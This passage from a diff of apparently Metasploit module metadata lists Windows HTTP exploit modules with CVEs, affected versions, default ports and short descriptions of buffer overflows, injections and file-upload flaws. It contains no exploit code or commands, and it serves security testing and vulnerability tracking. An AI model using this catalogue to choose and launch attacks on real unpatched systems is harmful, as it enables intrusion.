"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_modjk_overflow": { + "name": "Apache mod_jk 1.2.20 Buffer Overflow", + "fullname": "exploit/windows/http/apache_modjk_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-02", + "type": "exploit", + "author": [ + "Nicob " + ], + "description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.", + "references": [ + "CVE-2007-0774", + "OSVDB-33855", + "BID-22791", + "ZDI-07-008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_modjk_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_modjk_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_tika_jp2_jscript": { + "name": "Apache Tika Header Command Injection", + "fullname": "exploit/windows/http/apache_tika_jp2_jscript", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-04-25", + "type": "exploit", + "author": [ + "h00die", + "David Yesland", + "Tim Allison" + ], + "description": "This module exploits a command injection vulnerability in Apache\n Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is\n used to bypass magic bytes checking. When OCR is specified in the\n request, parameters can be passed to change the parameters passed\n at command line to allow for arbitrary JScript to execute. A\n JScript stub is passed to execute arbitrary code. This module was\n verified against version 1.15 - 1.17 on Windows 2012.\n While the CVE and finding show more versions vulnerable, during\n testing it was determined only > 1.14 was exploitable due to\n jp2 support being added.", + "references": [ + "EDB-46540", + "URL-https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/", + "URL-https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E", + "CVE-2018-1335" + ], + "platform": "Windows", + "arch": "", + "rport": 9998, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/apache_tika_jp2_jscript.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_tika_jp2_jscript", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/avaya_ccr_imageupload_exec": { + "name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution", + "fullname": "exploit/windows/http/avaya_ccr_imageupload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-28", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.", + "references": [ + "CVE-2012-3811", + "OSVDB-83399", + "BID-54225", + "URL-https://downloads.avaya.com/css/P8/documents/100164021", + "ZDI-12-106" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2019-08-02 09:48:53 +0000", + "path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/avaya_ccr_imageupload_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/badblue_ext_overflow": { + "name": "BadBlue 2.5 EXT.dll Buffer Overflow", + "fullname": "exploit/windows/http/badblue_ext_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-04-20", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This is a stack buffer overflow exploit for BadBlue version 2.5.", + "references": [ + "CVE-2005-0595", + "OSVDB-14238", + "BID-7387" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "BadBlue 2.5 (Universal)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/badblue_ext_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/badblue_ext_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/badblue_passthru": { + "name": "BadBlue 2.72b PassThru Buffer Overflow", + "fullname": "exploit/windows/http/badblue_passthru", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-12-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.", + "references": [ + "CVE-2007-6377", + "OSVDB-42416", + "BID-26803" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "BadBlue EE 2.7 Universal", + "BadBlue 2.72b Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/badblue_passthru.rb", + "is_install_path": true, + "ref_name": "windows/http/badblue_passthru", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_jsessionid": { + "name": "BEA WebLogic JSESSIONID Cookie Value Overflow", + "fullname": "exploit/windows/http/bea_weblogic_jsessionid", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-13", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.", + "references": [ + "CVE-2008-5457", + "OSVDB-51311" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Apache 2.2 - WebLogic module version 1.0.1136334", + "Windows Apache 2.2 - WebLogic module version 1.0.1150354" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_jsessionid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_post_bof": { + "name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", + "fullname": "exploit/windows/http/bea_weblogic_post_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-07-17", + "type": "exploit", + "author": [ + "KingCope", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.", + "references": [ + "CVE-2008-3257", + "OSVDB-47096", + "BID-30273" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", + "BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", + "BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_post_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/bea_weblogic_transfer_encoding": { + "name": "BEA Weblogic Transfer-Encoding Buffer Overflow", + "fullname": "exploit/windows/http/bea_weblogic_transfer_encoding", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-09-09", + "type": "exploit", + "author": [ + "pusscat " + ], + "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.", + "references": [ + "CVE-2008-4008", + "OSVDB-49283" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Apache 2.2 version Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb", + "is_install_path": true, + "ref_name": "windows/http/bea_weblogic_transfer_encoding", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/belkin_bulldog": { + "name": "Belkin Bulldog Plus Web Service Buffer Overflow", + "fullname": "exploit/windows/http/belkin_bulldog", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-03-08", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-54395", + "BID-34033", + "EDB-8173" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/belkin_bulldog.rb", + "is_install_path": true, + "ref_name": "windows/http/belkin_bulldog", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_arcserve_rpc_authbypass": { + "name": "CA Arcserve D2D GWT RPC Credential Information Disclosure", + "fullname": "exploit/windows/http/ca_arcserve_rpc_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-25", + "type": "exploit", + "author": [ + "bannedit ", + "rgod" + ], + "description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclosure the username and password in cleartext used for authentication. This\n username and password pair are Windows credentials with Administrator access.", + "references": [ + "CVE-2011-3011", + "OSVDB-74162", + "EDB-17574" + ], + "platform": "Windows", + "arch": "", + "rport": 8014, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_arcserve_rpc_authbypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_igateway_debug": { + "name": "CA iTechnology iGateway Debug Mode Buffer Overflow", + "fullname": "exploit/windows/http/ca_igateway_debug", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-10-06", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When True is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. This module works best with Ordinal payloads.", + "references": [ + "CVE-2005-3190", + "OSVDB-19920", + "URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485", + "EDB-1243", + "BID-15025" + ], + "platform": "Windows", + "arch": "", + "rport": 5250, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iGateway 3.0.40621.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ca_igateway_debug.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_igateway_debug", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ca_totaldefense_regeneratereports": { + "name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection", + "fullname": "exploit/windows/http/ca_totaldefense_regeneratereports", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-04-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql\n statements into the ReportIDs element.", + "references": [ + "ZDI-11-134", + "OSVDB-74968", + "CVE-2011-1653" + ], + "platform": "Windows", + "arch": "", + "rport": 34443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb", + "is_install_path": true, + "ref_name": "windows/http/ca_totaldefense_regeneratereports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/cayin_xpost_sql_rce": { + "name": "Cayin xPost wayfinder_seqid SQLi to RCE", + "fullname": "exploit/windows/http/cayin_xpost_sql_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-04", + "type": "exploit", + "author": [ + "h00die", + "Gjoko Krstic (LiquidWorm) " + ], + "description": "This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The\n wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected\n with a blind SQLi. Since this app bundles MySQL and apache Tomcat the\n environment is pretty static and therefore the default settings should\n work. Results in SYSTEM level access.\n Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads\n seem to be valid.", + "references": [ + "EDB-48558", + "URL-https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php", + "CVE-2020-7356" + ], + "platform": "Java,Windows", + "arch": "java", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/cayin_xpost_sql_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/cayin_xpost_sql_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/cogent_datahub_command": { + "name": "Cogent DataHub Command Injection", + "fullname": "exploit/windows/http/cogent_datahub_command", + "aliases": [], + "rank": 0, + "disclosure_date": "2014-04-29", + "type": "exploit", + "author": [ + "John Leitch", + "juan vazquez " + ], + "description": "This module exploits an injection vulnerability in Cogent DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and restart manually.", + "references": [ + "ZDI-14-136", + "CVE-2014-3789", + "BID-67486" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Cogent DataHub < 7.3.5" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/cogent_datahub_command.rb", + "is_install_path": true, + "ref_name": "windows/http/cogent_datahub_command", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/cogent_datahub_request_headers_bof": { + "name": "Cogent DataHub HTTP Server Buffer Overflow", + "fullname": "exploit/windows/http/cogent_datahub_request_headers_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.", + "references": [ + "CVE-2013-0680", + "OSVDB-95819", + "BID-53455", + "ZDI-13-178", + "URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 English / Cogent DataHub 7.3.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/cogent_datahub_request_headers_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/coldfusion_fckeditor": { + "name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute", + "fullname": "exploit/windows/http/coldfusion_fckeditor", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-07-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.", + "references": [ + "CVE-2009-2265", + "OSVDB-55684" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb", + "is_install_path": true, + "ref_name": "windows/http/coldfusion_fckeditor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/cyclope_ess_sqli": { + "name": "Cyclope Employee Surveillance Solution v6 SQL Injection", + "fullname": "exploit/windows/http/cyclope_ess_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-08", + "type": "exploit", + "author": [ + "loneferret", + "sinn3r " + ], + "description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.", + "references": [ + "OSVDB-84517", + "EDB-20393" + ], + "platform": "Windows", + "arch": "", + "rport": 7879, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Cyclope Employee Surveillance Solution v6.2 or older" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/cyclope_ess_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_deserialization": { + "name": "ManageEngine Desktop Central Java Deserialization", + "fullname": "exploit/windows/http/desktopcentral_deserialization", + "aliases": [], + "rank": 500, + "disclosure_date": "2020-03-05", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n Quoting the vendor's advisory on fixed versions:\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of\n that, the complete fix for the remote code execution vulnerability is\n now available in build 10.0.479.\"", + "references": [ + "CVE-2020-10189", + "URL-https://srcincite.io/advisories/src-2020-0011/", + "URL-https://srcincite.io/pocs/src-2020-0011.py.txt", + "URL-https://twitter.com/steventseeley/status/1235635108498948096", + "URL-https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8383, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_file_upload": { + "name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload", + "fullname": "exploit/windows/http/desktopcentral_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-11-11", + "type": "exploit", + "author": [ + "Thomas Hibbert " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.", + "references": [ + "CVE-2013-7390", + "OSVDB-100008", + "URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf", + "URL-https://seclists.org/fulldisclosure/2013/Nov/130" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Desktop Central v7 - v8 build 80292 / Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/desktopcentral_statusupdate_upload": { + "name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", + "fullname": "exploit/windows/http/desktopcentral_statusupdate_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-08-31", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.", + "references": [ + "CVE-2014-5005", + "OSVDB-110643", + "URL-https://seclists.org/fulldisclosure/2014/Aug/88" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Desktop Central v7 to v9 build 90054 / Windows" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/desktopcentral_statusupdate_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/disk_pulse_enterprise_bof": { + "name": "Disk Pulse Enterprise Login Buffer Overflow", + "fullname": "exploit/windows/http/disk_pulse_enterprise_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-10-03", + "type": "exploit", + "author": [ + "Chris Higgins", + "Tulpa Security" + ], + "description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n uses the Egghunter technique.", + "references": [ + "EDB-40452" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Pulse Enterprise 9.0.34" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disk_pulse_enterprise_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disk_pulse_enterprise_get": { + "name": "Disk Pulse Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disk_pulse_enterprise_get", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-08-25", + "type": "exploit", + "author": [ + "Chance Johnson", + "Nipun Jaswal & Anurag Srivastava" + ], + "description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.", + "references": [ + "EDB-42560" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Pulse Enterprise 9.9.16" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb", + "is_install_path": true, + "ref_name": "windows/http/disk_pulse_enterprise_get", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/diskboss_get_bof": { + "name": "DiskBoss Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/diskboss_get_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-12-05", + "type": "exploit", + "author": [ + "vportal", + "Ahmad Mahfouz", + "Gabor Seljan", + "Jacob Robles" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "EDB-40869", + "EDB-42395" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "DiskBoss Enterprise v7.4.28", + "DiskBoss Enterprise v7.5.12", + "DiskBoss Enterprise v8.2.14" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/diskboss_get_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/diskboss_get_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disksavvy_get_bof": { + "name": "DiskSavvy Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disksavvy_get_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-12-01", + "type": "exploit", + "author": [ + "vportal", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2017-6187", + "EDB-40869" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "DiskSavvy Enterprise v9.1.14", + "DiskSavvy Enterprise v9.3.14" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disksavvy_get_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disksavvy_get_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disksorter_bof": { + 